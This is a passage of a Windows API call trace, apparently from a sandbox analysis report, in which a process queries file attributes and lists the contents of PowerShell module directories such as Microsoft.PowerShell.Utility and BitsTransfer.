ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0157.816] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e358) returned 1 [0157.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4e [0157.816] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management", nBufferLength=0x4e, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management", lpFilePart=0x0) returned 0x4d [0157.816] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e35c) returned 1 [0157.816] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.wsman.management"), fInfoLevelId=0x0, lpFileInformation=0x5a0e620 | out: lpFileInformation=0x5a0e620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x498007e0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x498007e0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x498007e0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0157.816] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e358) returned 1 [0157.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4f [0157.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration", nBufferLength=0x4f, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration", lpFilePart=0x0) returned 0x4e [0157.817] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e35c) returned 1 [0157.817] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdesiredstateconfiguration"), fInfoLevelId=0x0, lpFileInformation=0x5a0e620 | out: lpFileInformation=0x5a0e620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x497da680, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x497da680, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0157.817] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e358) returned 1 [0157.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x41 [0157.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics", nBufferLength=0x41, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics", lpFilePart=0x0) returned 0x40 [0157.817] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e35c) returned 1 [0157.817] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psdiagnostics"), fInfoLevelId=0x0, lpFileInformation=0x5a0e620 | out: lpFileInformation=0x5a0e620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8100bf6e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8100bf6e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0157.817] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e358) returned 1 [0157.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x42 [0157.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob", nBufferLength=0x42, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob", lpFilePart=0x0) returned 0x41 [0157.818] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e35c) returned 1 [0157.818] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\psscheduledjob"), fInfoLevelId=0x0, lpFileInformation=0x5a0e620 | out: lpFileInformation=0x5a0e620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0157.818] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e358) returned 1 [0157.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x47 [0157.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack", nBufferLength=0x47, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack", lpFilePart=0x0) returned 0x46 [0157.818] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e35c) returned 1 [0157.818] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\troubleshootingpack"), fInfoLevelId=0x0, lpFileInformation=0x5a0e620 | out: lpFileInformation=0x5a0e620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1e4bcac7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0157.818] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e358) returned 1 [0157.819] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e60c) returned 1 [0157.819] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0157.819] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x50, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", lpFilePart=0x0) returned 0x4f [0157.819] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\*" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\*"), lpFindFileData=0x5a0e3bc | out: lpFindFileData=0x5a0e3bc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bfe238 [0157.819] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0157.819] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2d1d80, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e2d1d80, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f20f74b, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x982, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility.psd1", cAlternateFileName="")) returned 1 [0157.820] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e285ac0, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e285ac0, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f214576, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x7778, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility.psm1", cAlternateFileName="")) returned 1 [0157.820] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e285ac0, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e285ac0, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f214576, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x7778, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility.psm1", cAlternateFileName="")) returned 0 [0157.820] FindClose (in: hFindFile=0x5bfe238 | out: hFindFile=0x5bfe238) returned 1 [0157.820] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e37c) returned 1 [0157.820] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e5dc) returned 1 [0157.820] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1")) returned 0x20 [0157.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0157.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x72, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0157.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0157.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x72, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0157.820] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e384) returned 1 [0157.821] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25cd0c4 | out: lpFileInformation=0x25cd0c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2d1d80, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e2d1d80, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f20f74b, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x982)) returned 1 [0157.821] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e380) returned 1 [0157.821] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e60c) returned 1 [0157.821] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x53 [0157.821] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management", nBufferLength=0x53, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management", lpFilePart=0x0) returned 0x52 [0157.821] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\*" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\*"), lpFindFileData=0x5a0e3bc | out: lpFindFileData=0x5a0e3bc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bfe238 [0157.821] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0157.822] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2d1d80, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e2d1d80, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f1e8618, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x9e9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management.psd1", cAlternateFileName="")) returned 1 [0157.822] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2d1d80, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e2d1d80, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f1e8618, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x9e9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management.psd1", cAlternateFileName="")) returned 0 [0157.822] FindClose (in: hFindFile=0x5bfe238 | out: hFindFile=0x5bfe238) returned 1 [0157.822] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e37c) returned 1 [0157.822] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e5dc) returned 1 [0157.822] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1")) returned 0x20 [0157.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x78 [0157.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x78, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77 [0157.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x78 [0157.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x78, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77 [0157.822] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e384) returned 1 [0157.823] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25cd888 | out: lpFileInformation=0x25cd888*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2d1d80, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e2d1d80, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f1e8618, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x9e9)) returned 1 [0157.823] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e380) returned 1 [0157.823] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e60c) returned 1 [0157.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x40 [0157.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer", nBufferLength=0x40, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer", lpFilePart=0x0) returned 0x3f [0157.823] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\*" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\bitstransfer\\*"), lpFindFileData=0x5a0e3bc | out: lpFindFileData=0x5a0e3bc*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1e4bcac7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5bfe238 [0157.823] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1e4bcac7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0157.823] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37af1c1c, ftCreationTime.dwHighDateTime=0x1c9ea13, ftLastAccessTime.dwLowDateTime=0x37af1c1c, ftLastAccessTime.dwHighDateTime=0x1c9ea13, ftLastWriteTime.dwLowDateTime=0x37af1c1c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x3f38, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer.Format.ps1xml", cAlternateFileName="")) returned 1 [0157.824] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14a2760e, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x14a2760e, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x37b3dedc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x3b6, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer.psd1", cAlternateFileName="")) returned 1 [0157.824] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x1e4bcac7, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22bdbd7c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0157.824] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3c83bd9, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb3c83bd9, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb3c83bd9, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x19800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll", cAlternateFileName="")) returned 1 [0157.824] FindNextFileW (in: hFindFile=0x5bfe238, lpFindFileData=0x5a0e3c4 | out: lpFindFileData=0x5a0e3c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3c83bd9, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb3c83bd9, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb3c83bd9, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x19800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll", cAlternateFileName="")) returned 0 [0157.824] FindClose (in: hFindFile=0x5bfe238 | out: hFindFile=0x5bfe238) returned 1 [0157.824] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e37c) returned 1 [0157.824] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e5dc) returned 1 [0157.824] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\bitstransfer\\bitstransfer.psd1")) returned 0x20 [0157.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x52 [0157.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", nBufferLength=0x52, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", lpFilePart=0x0) returned 0x51 [0157.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x52 [0157.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", nBufferLength=0x52, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", lpFilePart=0x0) returned 0x51 [0157.825] SetThreadErrorMode (dwNewMode=0x1, 